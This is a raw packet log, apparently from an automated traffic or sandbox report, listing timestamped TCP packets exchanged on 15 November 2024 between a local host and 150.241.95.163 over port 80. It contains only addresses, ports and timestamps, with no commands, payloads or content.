                                                                                                                                                                Nov 15, 2024 10:28:29.870541096 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870548010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870604038 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.870615959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870625973 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870661020 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.870749950 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870765924 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870776892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870785952 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.870795012 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870805979 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870817900 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.870846987 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.870887995 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870898962 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870943069 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.870968103 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870981932 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.870995045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.871018887 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.871037960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.871049881 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.871078968 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.910703897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.910870075 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.911463976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.958039999 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.992400885 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992427111 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992436886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992501974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992512941 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992523909 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992536068 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.992546082 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992580891 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.992614985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992631912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992646933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992669106 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.992693901 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.992857933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992867947 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992877960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992904902 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.992968082 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992979050 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.992990017 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993011951 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.993045092 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.993102074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993112087 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993122101 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993133068 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993144989 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993153095 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.993184090 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.993588924 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993599892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993611097 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993630886 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.993660927 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.993813038 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993824959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993834972 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993856907 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.993946075 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993957043 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993974924 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993985891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.993993998 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.994004011 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.994038105 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.994060993 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.994430065 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.994493008 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.994503975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.994537115 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.994647026 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.994657040 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.994689941 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.994757891 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.994769096 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.994806051 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.995007992 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.995018959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.995029926 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.995059967 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.995100021 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.995203018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.995213985 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.995224953 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.995235920 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:29.995282888 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:29.995305061 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.036109924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.090409040 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.090423107 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.090434074 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.090480089 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.115797997 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.115814924 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.115829945 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.115859985 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.115890026 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.115922928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.115936995 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.115951061 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.115964890 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.115979910 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.115997076 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116003990 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.116018057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116027117 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.116050959 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.116159916 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116183043 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116197109 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116209030 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.116246939 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.116276979 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116291046 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116306067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116324902 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116342068 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.116354942 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116364956 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.116379023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116430998 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.116590023 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116611958 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116624117 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.116647959 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.116986036 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117000103 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117024899 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.117032051 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117046118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117059946 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117069960 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.117100954 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.117216110 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117227077 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117238045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117264032 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.117603064 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117656946 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.117664099 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117676020 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117711067 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.117739916 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117753029 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117785931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117796898 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117804050 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.117815018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117846966 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.117904902 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117957115 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.117985964 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.117996931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.118026018 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.118309975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.118320942 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.118330956 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.118351936 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.118417978 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.118462086 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.118469954 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.118483067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.118520021 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.118525028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.120699883 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.120744944 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.120793104 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.161482096 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.213426113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.213448048 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.213460922 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.213541031 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239011049 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239077091 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239131927 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239144087 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239155054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239173889 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239183903 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239217043 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239264965 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239276886 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239288092 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239298105 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239305973 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239310026 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239332914 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239346981 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239350080 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239408016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239418030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239428997 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239442110 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239459991 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239521027 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239531994 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239542961 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239553928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239576101 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239598989 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239636898 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239712954 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239723921 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239748001 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.239761114 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239772081 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.239800930 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.240263939 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240283966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240294933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240305901 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240307093 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.240334988 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.240473986 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240484953 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240495920 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240509033 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.240530014 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.240694046 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240756035 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240767002 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240789890 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.240850925 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240885019 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.240905046 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240916967 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.240950108 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.241060019 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241070986 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241081953 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241092920 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241105080 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.241127968 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.241137981 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241147995 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241189957 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.241576910 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241595984 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241606951 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241628885 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.241976976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.241995096 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.242006063 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.242016077 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.242017031 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.242029905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.242038012 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.242070913 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.282830000 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.282867908 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.282880068 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.282973051 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.336842060 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.336857080 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.336868048 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.336913109 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363046885 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363135099 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363147974 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363159895 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363169909 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363181114 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363198996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363210917 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363210917 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363212109 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363221884 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363231897 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363233089 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363244057 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363255024 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363255024 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363266945 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363276958 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363296032 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363389969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363400936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363446951 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363511086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363521099 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363532066 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363569975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363575935 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363580942 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363591909 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363603115 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363615036 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363637924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:30.363811016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363821030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:30.363857031 CET4973680192.168.2.4150.241.95.163
